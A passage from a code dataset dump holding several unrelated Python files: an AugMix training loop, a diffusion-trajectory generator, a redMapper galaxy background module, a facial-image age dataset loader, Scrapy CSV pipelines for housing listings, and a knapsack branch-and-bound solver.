targets.to(self.device)\n logits_all = self.model(images_all)\n logits_clean, logits_aug1, logits_aug2 = torch.split(\n logits_all, images[0].size(0))\n\n # Cross-entropy is only computed on clean images\n loss = F.cross_entropy(logits_clean, targets)\n\n p_clean, p_aug1, p_aug2 = F.softmax(\n logits_clean, dim=1), F.softmax(\n logits_aug1, dim=1), F.softmax(\n logits_aug2, dim=1)\n\n # Clamp mixture distribution to avoid exploding KL divergence\n p_mixture = torch.clamp((p_clean + p_aug1 + p_aug2) / 3., 1e-7, 1).log()\n loss += 12 * (F.kl_div(p_mixture, p_clean, reduction='batchmean') +\n F.kl_div(p_mixture, p_aug1, reduction='batchmean') +\n F.kl_div(p_mixture, p_aug2, reduction='batchmean')) / 3.\n\n\n if batch_idx % 100 == 1:\n print(f'epoch: {epoch_idx}/{self.args.epochs}, batch: {batch_idx}/{len(self.train_loader)}, '\n f'loss: {loss.item()}')\n\n n_iter = epoch_idx * len(self.train_loader) + batch_idx\n self.writer.add_scalar('loss_train', loss.item(), n_iter)\n\n loss.backward()\n self.optimizer.step()\n self.scheduler.step()\n\n last_layer = list(self.model.children())[-1]\n for name, para in last_layer.named_parameters():\n if 'weight' in name:\n self.writer.add_scalar('LastLayerGradients/grad_norm2_weights', para.grad.norm(), n_iter)\n if 'bias' in name:\n self.writer.add_scalar('LastLayerGradients/grad_norm2_bias', para.grad.norm(), n_iter)\n\n self.model.eval()\n with torch.no_grad():\n total = len(self.val_loader.dataset)\n class_correct = self.do_test(self.val_loader)\n class_acc = float(class_correct) / total\n print(f'Validation Accuracy: {class_acc}')\n\n is_best = False\n if class_acc > self.best_acc:\n self.best_acc = class_acc\n is_best = True\n\n if is_best or (epoch_idx + 1) % self.args.save_checkpoint_interval == 0:\n checkpoint_name = f'checkpoint_{epoch_idx + 1}_acc_{round(class_acc, 3)}.pth.tar'\n print(f'Saving {checkpoint_name} to dir {self.args.checkpoint}')\n\n if self.args.data_parallel:\n state_dict = self.model.module.state_dict()\n else:\n state_dict = self.model.state_dict()\n\n save_checkpoint({\n 'epoch': epoch_idx + 1,\n 'state_dict': state_dict,\n 'best_prec1': self.best_acc,\n 'optimizer': self.optimizer.state_dict(),\n }, is_best, checkpoint=self.args.checkpoint, filename=checkpoint_name)\n\n self.writer.add_scalar('val_accuracy', class_acc, epoch_idx)\n\n def do_test(self, loader):\n class_correct = 0\n\n for i, (inputs, targets, _) in enumerate(loader, 1):\n inputs, targets = inputs.to(self.device), targets.to(self.device)\n\n # forward\n outputs = self.model(inputs)\n\n _, cls_pred = outputs.max(dim=1)\n\n class_correct += torch.sum(cls_pred == targets)\n\n return class_correct\n\n def do_training(self):\n for self.current_epoch in range(self.start_epoch, self.args.epochs):\n self._do_epoch(self.current_epoch)\n\n self.writer.close()\n\n return self.best_acc\n\ndef main():\n args = get_args()\n\n torch.manual_seed(0)\n torch.cuda.manual_seed(0)\n np.random.seed(0)\n random.seed(0)\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n if sys.gettrace() is not None: # debug\n print('Debug mode!')\n args.n_workers = 0\n\n save_args_json(args)\n\n trainer = Trainer(args, device)\n best_val_acc = trainer.do_training()\n\nif __name__ == \"__main__\":\n torch.cuda.empty_cache()\n torch.backends.cudnn.benchmark = True\n main()","sub_path":"CIFAR100/train_augmix.py","file_name":"train_augmix.py","file_ext":"py","file_size_in_byte":10385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"234446311","text":"import andi\r\nimport numpy as np\r\nimport pandas as pd\r\nimport argparse\r\nimport gc\r\n\r\nparser = argparse.ArgumentParser()\r\narg = parser.add_argument\r\narg('--N', type=int)\r\narg('--l', type=int)\r\nargs = parser.parse_args()\r\n\r\nN = args.N\r\nl = args.l\r\nfilename = './origin_data/data-2d-{}.csv'.format(l)\r\noutput = './pp_data_2d/data-2d-{}-pp.csv'.format(l)\r\n\r\nAD = andi.andi_datasets()\r\nX1, Y1, X2, Y2, X3, Y3 = AD.andi_dataset(N=N, max_T=l+1, min_T=l, tasks=1, dimensions=2)\r\n\r\nwith open(filename, 'w') as f:\r\n f.write('pos;label\\n')\r\n for i in range(len(X1[1])):\r\n f.write(','.join([str(j) for j in X1[1][i]]))\r\n f.write(';'+str(Y1[1][i])+'\\n')\r\n f.close()\r\n\r\ndel X1, Y1\r\ngc.collect()\r\n\r\ndata = pd.read_csv(filename, sep=';')\r\ndata['length'] = data['pos'].apply(lambda x: round(len(x.split(','))/2))\r\n\r\ndata['pos_x'] = data.apply(lambda x: ','.join(x['pos'].split(',')[:x['length']]), axis=1)\r\ndata['pos_y'] = data.apply(lambda x: ','.join(x['pos'].split(',')[x['length']:]), axis=1)\r\n\r\ndel data['pos']\r\n\r\ndef normalize(x):\r\n data = np.array([float(i) for i in x.split(',')])\r\n mean = np.mean(data)\r\n std = np.std(data)\r\n data2 = (data - mean)/std\r\n return ','.join([str(i) for i in data2])\r\n\r\ndata['pos_x'] = data['pos_x'].apply(lambda x: normalize(x))\r\ndata['pos_y'] = data['pos_y'].apply(lambda x: normalize(x))\r\n\r\ndata[['pos_x','pos_y','length','label']].to_csv(output, index=False, sep=';')\r\n","sub_path":"generate_trajectory/inf_generate_trajectory_2d.py","file_name":"inf_generate_trajectory_2d.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"161962445","text":"from __future__ import division, absolute_import, print_function\nfrom past.builtins import xrange\n\nimport fitsio\nimport numpy as np\nimport healpy as hp\nimport time\nimport copy\n\nimport multiprocessing\nfrom multiprocessing import Pool\n\nimport types\ntry:\n import copy_reg as copyreg\nexcept ImportError:\n import copyreg\n\nfrom .catalog import Entry\nfrom .galaxy import GalaxyCatalog\nfrom .redsequence import RedSequenceColorPar\nfrom .chisq_dist import ChisqDist\nfrom .depthmap import DepthMap\nfrom .utilities import interpol, cic\nfrom .utilities import _pickle_method\n\ncopyreg.pickle(types.MethodType, _pickle_method)\n\nclass Background(object):\n \"\"\"\n Name:\n Background\n Purpose:\n An object used to hold the background. This also\n contains the functionality to interpolate between\n known background points.\n\n parameters\n ----------\n filename: string\n background filename\n \"\"\"\n\n def __init__(self, filename):\n #\"\"\"\n #docstring for the constructor\n #\"\"\"\n # Get the raw object background from the fits file\n obkg = Entry.from_fits_file(filename, ext='CHISQBKG')\n\n # Set the bin size in redshift, chisq and refmag spaces\n self.zbinsize = 0.001\n self.chisqbinsize = 0.5\n self.refmagbinsize = 0.01\n\n # Create the refmag bins\n refmagbins = np.arange(obkg.refmagrange[0], obkg.refmagrange[1], self.refmagbinsize)\n nrefmagbins = refmagbins.size\n\n # Create the chisq bins\n nchisqbins = obkg.chisqbins.size\n nlnchisqbins = obkg.lnchisqbins.size\n\n # Read out the number of redshift bins from the object background\n nzbins = obkg.zbins.size\n\n # Set up some arrays to populate\n sigma_g_new = np.zeros((nrefmagbins, nchisqbins, nzbins))\n sigma_lng_new = np.zeros((nrefmagbins, nchisqbins, nzbins))\n\n # Do linear interpolation to get the sigma_g value\n # between the raw background points.\n # If any values are less than 0 then turn them into 0.\n for i in range(nzbins):\n for j in range(nchisqbins):\n sigma_g_new[:,j,i] = np.interp(refmagbins, obkg.refmagbins, obkg.sigma_g[:,j,i])\n sigma_g_new[:,j,i] = np.where(sigma_g_new[:,j,i] < 0, 0, sigma_g_new[:,j,i])\n sigma_lng_new[:,j,i] = np.interp(refmagbins, obkg.refmagbins, obkg.sigma_lng[:,j,i])\n sigma_lng_new[:,j,i] = np.where(sigma_lng_new[:,j,i] < 0, 0, sigma_lng_new[:,j,i])\n\n sigma_g = sigma_g_new.copy()\n sigma_lng = sigma_lng_new.copy()\n\n chisqbins = np.arange(obkg.chisqrange[0], obkg.chisqrange[1], self.chisqbinsize)\n nchisqbins = chisqbins.size\n\n sigma_g_new = np.zeros((nrefmagbins, nchisqbins, nzbins))\n\n # Now do the interpolation in chisq space\n for i in range(nzbins):\n for j in range(nrefmagbins):\n sigma_g_new[j,:,i] = np.interp(chisqbins, obkg.chisqbins, sigma_g[j,:,i])\n sigma_g_new[j,:,i] = np.where(sigma_g_new[j,:,i] < 0, 0, sigma_g_new[j,:,i])\n\n sigma_g = sigma_g_new.copy()\n\n zbins = np.arange(obkg.zrange[0], obkg.zrange[1], self.zbinsize)\n nzbins = zbins.size\n\n sigma_g_new = np.zeros((nrefmagbins, nchisqbins, nzbins))\n sigma_lng_new = np.zeros((nrefmagbins, nlnchisqbins, nzbins))\n\n # Now do the interpolation in redshift space\n for i in range(nchisqbins):\n for j in range(nrefmagbins):\n sigma_g_new[j,i,:] = np.interp(zbins, obkg.zbins, sigma_g[j,i,:])\n sigma_g_new[j,i,:] = np.where(sigma_g_new[j,i,:] < 0, 0, sigma_g_new[j,i,:])\n\n for i in range(nlnchisqbins):\n for j in range(nrefmagbins):\n sigma_lng_new[j,i,:] = np.interp(zbins, obkg.zbins, sigma_lng[j,i,:])\n sigma_lng_new[j,i,:] = np.where(sigma_lng_new[j,i,:] < 0, 0, sigma_lng_new[j,i,:])\n\n n_new = np.zeros((nrefmagbins, nzbins))\n for i in range(nzbins):\n n_new[:,i] = np.sum(sigma_g_new[:,:,i], axis=1) * self.chisqbinsize\n\n # Save all meaningful fields\n # to be attributes of the background object.\n self.refmagbins = refmagbins\n self.chisqbins = chisqbins\n self.lnchisqbins = obkg.lnchisqbins\n self.zbins = zbins\n self.sigma_g = sigma_g_new\n self.sigma_lng = sigma_lng_new\n self.n = n_new\n\n def sigma_g_lookup(self, z, chisq, refmag, allow0=False):\n \"\"\"\n Name:\n sigma_g_lookup\n Purpose:\n return the value of sigma_g at points in redshift, chisq and refmag space\n Inputs:\n z: redshift\n chisq: chisquared value\n refmag: reference magnitude\n Optional Inputs:\n allow0 (boolean): if we allow sigma_g to be zero \n and the chisq is very high. Set to False by default.\n Outputs:\n lookup_vals: the looked-up values of sigma_g\n \"\"\"\n zmin = self.zbins[0]\n chisqindex = np.searchsorted(self.chisqbins, chisq) - 1\n refmagindex = np.searchsorted(self.refmagbins, refmag) - 1\n # Look into changing to searchsorted\n ind = np.clip(np.round((z-zmin)/(self.zbins[1]-zmin)),0, self.zbins.size-1).astype(np.int32)\n\n badchisq, = np.where((chisq < self.chisqbins[0]) |\n (chisq > (self.chisqbins[-1] + self.chisqbinsize)))\n badrefmag, = np.where((refmag <= self.refmagbins[0]) |\n (refmag > (self.refmagbins[-1] + self.refmagbinsize)))\n\n chisqindex[badchisq] = 0\n refmagindex[badrefmag] = 0\n\n zindex = np.full_like(chisqindex, ind)\n lookup_vals = self.sigma_g[refmagindex, chisqindex, zindex]\n lookup_vals[badchisq] = np.inf\n lookup_vals[badrefmag] = np.inf\n\n if not allow0:\n lookup_vals[np.where((lookup_vals == 0) & (chisq > 5.0))] = np.inf\n return lookup_vals\n\nclass ZredBackground(object):\n \"\"\"\n \"\"\"\n\n def __init__(self, filename):\n obkg = Entry.from_fits_file(filename, ext='ZREDBKG')\n\n # Will want to make configurable\n self.refmagbinsize = 0.01\n self.zredbinsize = 0.001\n\n # Create the refmag bins\n refmagbins = np.arange(obkg.refmagrange[0], obkg.refmagrange[1], self.refmagbinsize)\n nrefmagbins = refmagbins.size\n\n # Leave the zred bins the same\n nzredbins = obkg.zredbins.size\n\n # Set up arrays to populate\n # sigma_g_new = np.zeros((nzredbins, nrefmagbins))\n sigma_g_new = np.zeros((nrefmagbins, nzredbins))\n\n floor = np.min(obkg.sigma_g)\n\n for i in xrange(nzredbins):\n #sigma_g_new[i, :] = np.clip(interpol(obkg.sigma_g[i, :], obkg.refmagbins, refmagbins), floor, None)\n sigma_g_new[:, i] = np.clip(interpol(obkg.sigma_g[:, i], obkg.refmagbins, refmagbins), floor, None)\n\n sigma_g = sigma_g_new.copy()\n\n # And update zred\n zredbins = np.arange(obkg.zredrange[0], obkg.zredrange[1], self.zredbinsize)\n nzredbins = zredbins.size\n\n #sigma_g_new = np.zeros((nzredbins, nrefmagbins))\n sigma_g_new = np.zeros((nrefmagbins, nzredbins))\n\n for i in xrange(nrefmagbins):\n #sigma_g_new[:, i] = np.clip(interpol(sigma_g[:, i], obkg.zredbins, zredbins), floor, None)\n sigma_g_new[i, :] = np.clip(interpol(sigma_g[i, :], obkg.zredbins, zredbins), floor, None)\n\n self.zredbins = zredbins\n self.zredrange = obkg.zredrange\n self.zred_index = 0\n self.refmag_index = 1\n self.refmagbins = refmagbins\n self.refmagrange = obkg.refmagrange\n self.sigma_g = sigma_g_new\n\n def sigma_g_lookup(self, zred, refmag):\n \"\"\"\n \"\"\"\n\n zredindex = np.searchsorted(self.zredbins, zred) - 1\n refmagindex = np.searchsorted(self.refmagbins, refmag) - 1\n\n badzred, = np.where((zredindex < 0) |\n (zredindex >= self.zredbins.size))\n zredindex[badzred] = 0\n badrefmag, = np.where((refmagindex < 0) |\n (refmagindex >= self.refmagbins.size))\n refmagindex[badrefmag] = 0\n\n #lookup_vals = self.sigma_g[zredindex, refmagindex]\n lookup_vals = self.sigma_g[refmagindex, zredindex]\n\n lookup_vals[badzred] = np.inf\n lookup_vals[badrefmag] = np.inf\n\n return lookup_vals\n\nclass BackgroundGenerator(object):\n \"\"\"\n \"\"\"\n\n def __init__(self, config):\n # We need to delete \"cosmo\" from the config for pickling/multiprocessing\n self.config = copy.deepcopy(config)\n self.config.cosmo = None\n\n def run(self, clobber=False, natatime=100000, deepmode=False):\n \"\"\"\n \"\"\"\n\n self.natatime = natatime\n self.deepmode = deepmode\n\n if not clobber:\n if os.path.isfile(self.config.bkgfile):\n fits = fitsio.FITS(self.config.bkgfile)\n if 'CHISQBKG' in [ext.get_extname() for ext in fits[1: ]]:\n print(\"CHISQBKG already in %s and clobber is False\" % (self.config.bkgfile))\n return\n fits.close()\n\n # get the ranges\n self.refmagrange = np.array([12.0, self.config.limmag_catalog])\n self.nrefmagbins = np.ceil((self.refmagrange[1] - self.refmagrange[0]) / self.config.bkg_refmagbinsize).astype(np.int32)\n self.refmagbins = np.arange(self.nrefmagbins) * self.config.bkg_refmagbinsize + self.refmagrange[0]\n\n self.chisqrange = np.array([0.0, self.config.chisq_max])\n self.nchisqbins = np.ceil((self.chisqrange[1] - self.chisqrange[0]) / self.config.bkg_chisqbinsize).astype(np.int32)\n self.chisqbins = np.arange(self.nchisqbins) * self.config.bkg_chisqbinsize + self.chisqrange[0]\n\n self.lnchisqbinsize = 0.2\n self.lnchisqrange = np.array([-2.0, 6.0])\n self.nlnchisqbins = np.ceil((self.lnchisqrange[1] - self.lnchisqrange[0]) / self.lnchisqbinsize).astype(np.int32)\n self.lnchisqbins = np.arange(self.nlnchisqbins) * self.lnchisqbinsize + self.lnchisqrange[0]\n\n self.nzbins = np.ceil((self.config.zrange[1] - self.config.zrange[0]) / self.config.bkg_zbinsize).astype(np.int32)\n self.zbins = np.arange(self.nzbins) * self.config.bkg_zbinsize + self.config.zrange[0]\n\n # this is the background hist\n sigma_g = np.zeros((self.nrefmagbins, self.nchisqbins, self.nzbins))\n sigma_lng = np.zeros((self.nrefmagbins, self.nlnchisqbins, self.nzbins))\n\n # We need the areas from the depth map\n depthstr = DepthMap(self.config)\n self.areas = depthstr.calc_areas(self.refmagbins)\n\n\n # Split into bins for parallel running\n logrange = np.log(np.array([self.config.zrange[0] - 0.001,\n self.config.zrange[1] + 0.001]))\n logbinsize = (logrange[1] - logrange[0]) / self.config.calib_nproc\n zedges = (np.exp(logrange[0]) + np.exp(logrange[1])) - np.exp(logrange[0] + np.arange(self.config.calib_nproc + 1) * logbinsize)\n\n worker_list = []\n for i in xrange(self.config.calib_nproc):\n ubins, = np.where((self.zbins < zedges[i]) & (self.zbins > zedges[i + 1]))\n gd, = np.where(ubins < self.zbins.size)\n ubins = ubins[gd]\n\n zbinmark = np.zeros(self.zbins.size, dtype=np.bool)\n zbinmark[ubins] = True\n\n worker_list.append(zbinmark)\n\n pool = Pool(processes=self.config.calib_nproc)\n retvals = pool.map(self._worker, worker_list, chunksize=1)\n pool.close()\n pool.join()\n\n # And store the results\n for zbinmark, sigma_g_sub, sigma_lng_sub in retvals:\n sigma_g[:, :, zbinmark] = sigma_g_sub\n sigma_lng[:, :, zbinmark] = sigma_lng_sub\n\n # And save them\n dtype = [('zbins', 'f4', self.zbins.size),\n ('zrange', 'f4', 2),\n ('zbinsize', 'f4'),\n ('chisq_index', 'i4'),\n ('refmag_index', 'i4'),\n ('chisqbins', 'f4', self.chisqbins.size),\n ('chisqrange', 'f4', 2),\n ('chisqbinsize', 'f4'),\n ('lnchisqbins', 'f4', self.lnchisqbins.size),\n ('lnchisqrange', 'f4', 2),\n ('lnchisqbinsize', 'f4'),\n ('areas', 'f4', self.areas.size),\n ('refmagbins', 'f4', self.refmagbins.size),\n ('refmagrange', 'f4', 2),\n ('refmagbinsize', 'f4'),\n ('sigma_g', 'f4', sigma_g.shape),\n ('sigma_lng', 'f4', sigma_lng.shape)]\n\n chisq_bkg = np.zeros(1, dtype=dtype)\n chisq_bkg[0]['zbins'] = self.zbins\n chisq_bkg[0]['zrange'] = self.config.zrange\n chisq_bkg[0]['zbinsize'] = self.config.bkg_zbinsize\n chisq_bkg[0]['chisq_index'] = 0\n chisq_bkg[0]['refmag_index'] = 1\n chisq_bkg[0]['chisqbins'] = self.chisqbins\n chisq_bkg[0]['chisqrange'] = self.chisqrange\n chisq_bkg[0]['chisqbinsize'] = self.config.bkg_chisqbinsize\n chisq_bkg[0]['lnchisqbins'] = self.lnchisqbins\n chisq_bkg[0]['lnchisqrange'] = self.lnchisqrange\n chisq_bkg[0]['lnchisqbinsize'] = self.lnchisqbinsize\n chisq_bkg[0]['areas'] = self.areas\n chisq_bkg[0]['refmagbins'] = self.refmagbins\n chisq_bkg[0]['refmagrange'] = self.refmagrange\n chisq_bkg[0]['refmagbinsize'] = self.config.bkg_refmagbinsize\n chisq_bkg[0]['sigma_g'] = sigma_g\n chisq_bkg[0]['sigma_lng'] = sigma_lng\n\n fitsio.write(self.config.bkgfile, chisq_bkg, extname='CHISQBKG', clobber=clobber)\n\n\n\n def _worker(self, zbinmark):\n \"\"\"\n \"\"\"\n\n starttime = time.time()\n\n zbins_use = self.zbins[zbinmark]\n zrange_use = np.array([zbins_use[0], zbins_use[-1] + self.config.bkg_zbinsize])\n\n # We need to load in the red sequence structure -- just in the specific redshift range\n zredstr = RedSequenceColorPar(self.config.parfile, zrange=zrange_use)\n\n zredstrbinsize = zredstr.z[1] - zredstr.z[0]\n zpos = np.searchsorted(zredstr.z, zbins_use)\n\n # How many galaxies total?\n if self.config.galfile_pixelized:\n master = Entry.from_fits_file(self.config.galfile)\n\n if (self.config.hpix > 0):\n # We need to take a sub-region\n theta, phi = hp.pix2ang(master.nside, master.hpix)\n ipring_big = hp.ang2pix(self.config.nside, theta, phi)\n subreg_indices, = np.where(ipring_big == self.config.hpix)\n else:\n subreg_indices = np.arange(master.hpix.size)\n\n ngal = np.sum(master.ngals[subreg_indices])\n npix = subreg_indices.size\n else:\n hdr = fitsio.read_header(self.config.galfile, ext=1)\n\n ngal = hdr['NAXIS2']\n npix = 0\n\n nmag = self.config.nmag\n ncol = nmag - 1\n\n # default values are all guaranteed to be out of range\n chisqs = np.zeros((ngal, zbins_use.size), dtype=np.float32) + np.exp(np.max(self.lnchisqbins)) + 100.0\n refmags = np.zeros(ngal, dtype=np.float32)\n\n if (self.deepmode):\n zlimmag = zredstr.mstar(zbins_use + self.config.bkg_zbinsize) - 2.5 * np.log10(0.01)\n else:\n zlimmag = zredstr.mstar(zbins_use + self.config.bkg_zbinsize) - 2.5 * np.log10(0.1)\n\n bad, = np.where(zlimmag >= self.config.limmag_catalog)\n zlimmag[bad] = self.config.limmag_catalog - 0.01\n zlimmagpos = np.clip(((zlimmag - self.refmagrange[0]) * self.nrefmagbins / (self.refmagrange[1] - self.refmagrange[0])).astype(np.int32), 0, self.nrefmagbins - 1)\n zlimmag = self.refmagbins[zlimmagpos] + self.config.bkg_refmagbinsize\n\n zbinmid = np.median(np.arange(zredstr.z.size - 1))\n\n # And the main loop\n ctr = 0\n p = 0\n # This covers both loops\n while ((ctr < ngal) and (p < npix)):\n # Read in a section of the galaxies, or the pixel\n if not self.config.galfile_pixelized:\n lo = ctr\n hi = np.clip(ctr + self.natatime, None, ngal)\n\n gals = GalaxyCatalog.from_fits_file(self.config.galfile, rows=np.arange(lo, hi))\n ctr = hi + 1\n else:\n if master.ngals[subreg_indices[p]] == 0:\n p += 1\n continue\n\n gals = GalaxyCatalog.from_galfile(self.config.galfile, nside=master.nside,\n hpix=master.hpix[subreg_indices[p]], border=0.0)\n\n lo = ctr\n hi = ctr + gals.size\n\n ctr += master.ngals[subreg_indices[p]]\n p += 1\n\n inds = np.arange(lo, hi)\n\n refmags[inds] = gals.refmag\n\n for i, zbin in enumerate(zbins_use):\n use, = np.where((gals.refmag > self.refmagrange[0]) &\n (gals.refmag < zlimmag[i]))\n\n if (use.size > 0):\n # Compute chisq at the redshift zbin\n chisqs[inds[use], i] = zredstr.calculate_chisq(gals[use], zbin)\n\n binsizes = self.config.bkg_refmagbinsize * self.config.bkg_chisqbinsize\n lnbinsizes = self.config.bkg_refmagbinsize * self.lnchisqbinsize\n\n sigma_g_sub = np.zeros((self.nrefmagbins, self.nchisqbins, zbins_use.size))\n sigma_lng_sub = np.zeros((self.nrefmagbins, self.nlnchisqbins, zbins_use.size))\n\n for i, zbin in enumerate(zbins_use):\n use, = np.where((chisqs[:, i] >= self.chisqrange[0]) &\n (chisqs[:, i] < self.chisqrange[1]) &\n (refmags >= self.refmagrange[0]) &\n (refmags < self.refmagrange[1]))\n chisqpos = (chisqs[use, i] - self.chisqrange[0]) * self.nchisqbins / (self.chisqrange[1] - self.chisqrange[0])\n refmagpos = (refmags[use] - self.refmagrange[0]) * self.nrefmagbins / (self.refmagrange[1] - self.refmagrange[0])\n\n value = np.ones(use.size)\n\n field = cic(value, chisqpos, self.nchisqbins, refmagpos, self.nrefmagbins, isolated=True)\n for j in xrange(self.nchisqbins):\n sigma_g_sub[:, j, i] = field[:, j] / (self.areas * binsizes)\n\n lnchisqs = np.log(chisqs[:, i])\n\n use, = np.where((lnchisqs >= self.lnchisqrange[0]) &\n (lnchisqs < self.lnchisqrange[1]) &\n (refmags >= self.refmagrange[0]) &\n (refmags < self.refmagrange[1]))\n lnchisqpos = (lnchisqs[use] - self.lnchisqrange[0]) * self.nlnchisqbins / (self.lnchisqrange[1] - self.lnchisqrange[0])\n refmagpos = (refmags[use] - self.refmagrange[0]) * self.nrefmagbins / (self.refmagrange[1] - self.refmagrange[0])\n\n value = np.ones(use.size)\n\n field2 = cic(value, lnchisqpos, self.nlnchisqbins, refmagpos, self.nrefmagbins, isolated=True)\n\n for j in xrange(self.nlnchisqbins):\n sigma_lng_sub[:, j, i] = field2[:, j] / (self.areas * lnbinsizes)\n\n print(\"Finished %.2f < z < %.2f in %.1f seconds\" % (zbins_use[0], zbins_use[-1],\n time.time() - starttime))\n\n return (zbinmark, sigma_g_sub, sigma_lng_sub)\n\n","sub_path":"redmapper/background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":19501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"586442589","text":"import matplotlib.pyplot as plt\nimport scipy.ndimage\nfrom scipy import misc\nimport scipy.io\nimport numpy as np\nimport glob\nfrom datetime import datetime, timedelta\n#import dill as pickle\n\n# following should be deleted or commented afer trial\n'''\nimport tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"/tmp/data\", one_hot = True)\n\nx, y = mnist.train.next_batch(1)\nprint(mnist.train.images.shape[0])\nprint(mnist.test.images.shape[0])\nprint(x.shape, 'type: ',type(x))\nprint(y.shape)\n'''\ndef resize_img(img_path):\n\timg = scipy.ndimage.imread(img_path, flatten=True)\n\timg = misc.imresize(img, (100, 100))\n\timg = img.flatten()\n\n\t# img = np.array([img])\n\n\treturn list(img)\n\ndef mat_loader(path):\n\t# matfile = '/home/jzhao/Desktop/wiki_crop/wiki.mat'\n\tmat = scipy.io.loadmat(path)\n\n\twiki = mat['wiki']\n\n\titem = wiki[0][0]\n\n\tdob = item[0][0]\n\tphoto_taken = item[1][0]\n\tphoto_path = item[2][0]\n\n\tlabel_dict = {}\n\n\tfor i in range(len(dob)):\n\t\tbirth = datetime.fromordinal(int(dob[i]))+timedelta(days=int(dob[i]%1))-timedelta(days=366)\n\t\tlabel_dict[photo_path[i][0]] = photo_taken[i]-birth.year\n\n\treturn label_dict\n\ndef generateData(mat_file, img_directory):\n\timages_and_labels = []\n\n\tmat_path = mat_file #'/home/jzhao/Desktop/wiki_crop/wiki.mat'\n\tlabel_dict = mat_loader(mat_path)\n\tprint(len(label_dict))\n\n\tcount=0\n\tfor folder in range(5): #!!! changed from 100 to 10\n\t\tpath = img_directory #'/home/jzhao/Desktop/wiki_crop/'\n\t\tf_name = str(folder) if folder>=10 else '0'+str(folder)\n\t\tpath += f_name + '/*.jpg'\n\t\tprint('reading images in file:', f_name)\n\t\tfor filename in glob.glob(path):\n\t\t\timg = scipy.ndimage.imread(filename)\n\t\t\tif img.shape[0]<=300 and img.shape[1]<=300:\n\t\t\t\tdata_x = resize_img(filename)\n\t\t\t\tdata_y = np.zeros(100)\n\t\t\t\tindex = label_dict[f_name+'/'+filename.split('/')[-1]]\n\t\t\t\t# if index > len(data_y):\n\t\t\t\tindex = int(len(data_y)/2) if index >= len(data_y) else index\n\t\t\t\tdata_y[index] += 1 #one_hot\n\t\t\t\tdata_y = list(data_y)\n\t\t\t\tcount += 1\n\n\t\t\t\t# images_and_label = []\n\t\t\t\t# images_and_label.append(data_x)\n\t\t\t\t# images_and_label.append(data_y)\n\t\t\t\t# images_and_labels.append(images_and_label)\n\t\t\t\timages_and_labels.append([data_x, data_y])\n\n\tprint('totally processed:', count, 'and', len(images_and_labels))\n\ttest_size = int(len(images_and_labels)*0.1)\n\n\t# print(type(images_and_labels[0][0]))\n\t# print(len(images_and_labels[:][0]))\n\t# print(images_and_labels[0][1].shape)\n\tfinal = np.array(images_and_labels)\n\tprint('extract from', final.shape)\n\n\t'''\n\t[\n\t\t[ [data],[label] ]\n\t]\n\n\t'''\n\n\ttrain_x = list(final[:, 0][:-test_size])\n\ttrain_y = list(final[:, 1][:-test_size])\n\n\ttest_x = list(final[:, 0][-test_size:])\n\ttest_y = list(final[:, 1][-test_size:])\n\n\tprint(len(train_x), len(test_x))\n\tprint(len(train_y), len(test_y))\n\tprint(len(train_x[0]), len(train_y[0]))\n\t'''\n\twith open('facialimage_set.pickle', 'wb') as f:\n\t\tpickle.dump([train_x, train_y, test_x, test_y], f)\n\t'''\n\treturn train_x, train_y, test_x, test_y\n\n\n\n\n\n","sub_path":"project1/generatePickle.py","file_name":"generatePickle.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"386784069","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\n\nimport re\nimport csv\n\n\nclass CSVPipeline(object):\n index = 0\n file = None\n\n def open_spider(self, spider):\n # encoding='utf-8\n self.file = open(\"E:\\\\Graduation Project\\\\DataAnalysis\\\\data\\\\pidu_house.csv\", \"a\",newline='')\n\n def process_item(self, item, spider):\n if self.index == 0:\n column_name = \"title,price,unit_price,community_name,region,type,construction_area,orientation,decoration,floor,elevator,purposes,release_date,house_structure,image_urls,from_url\\n\"\n self.file.write(column_name)\n self.index = 1\n self.writer = csv.writer(self.file)\n self.writer.writerow((item['title'], item['price'], item['unit_price'], item['community_name'],\n item['region'], item['type'], item['construction_area'], item['orientation'],\n item['decoration'],item['floor'],item['elevator'],item['purposes'],item['release_date'],\n item['house_structure'],item['image_urls'],item['from_url']))\n return item\n\n def close_spider(self, spider):\n self.file.close()\n\nclass MultiPipeline(object):\n file = None\n\n def open_spider(self, spider):\n # 多个爬虫salve同时写入同一house.csv\n self.file = open(\"total_house.csv\", \"a\",newline='')\n\n def process_item(self, item, spider):\n self.writer = csv.writer(self.file)\n self.writer.writerow((item['title'], item['price'], item['unit_price'], item['community_name'],\n item['region'], item['type'], item['construction_area'], item['orientation'],\n item['decoration'],item['floor'],item['elevator'],item['purposes'],item['release_date'],\n item['house_structure'],item['image_urls'],item['from_url']))\n return item\n\n def close_spider(self, spider):\n self.file.close()\n","sub_path":"bk_spider/bk/bk/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313822728","text":"from ..abstractsolver import AbstractSolver\nfrom ..model import Problem, Solution, Item\nfrom typing import List \nclass AbstractBnbSolver(AbstractSolver):\n \"\"\"\n An abstract branch-and-bound solver for the knapsack problems.\n\n Methods:\n --------\n upper_bound(left : List[Item], solution: Solution) -> float:\n given the list of still available items and the current solution,\n calculates the linear relaxation of the problem\n \"\"\"\n \n def upper_bound(self, left : List[Item], solution: Solution) -> float:\n sorted_items = sorted(left, reverse=True, key=lambda i: i.value / i.weight)\n capacity_left = self.problem.capacity - solution.weight\n current_value = solution.value\n for item in sorted_items:\n how_much_to_take = min(capacity_left, item.weight)\n capacity_left -= how_much_to_take\n current_value += (how_much_to_take / item.weight) * item.value\n\n if capacity_left <= 0:\n break\n return current_value\n\n \n def solve(self) -> Solution:\n raise Exception(\"this is an abstract solver, don't try to run 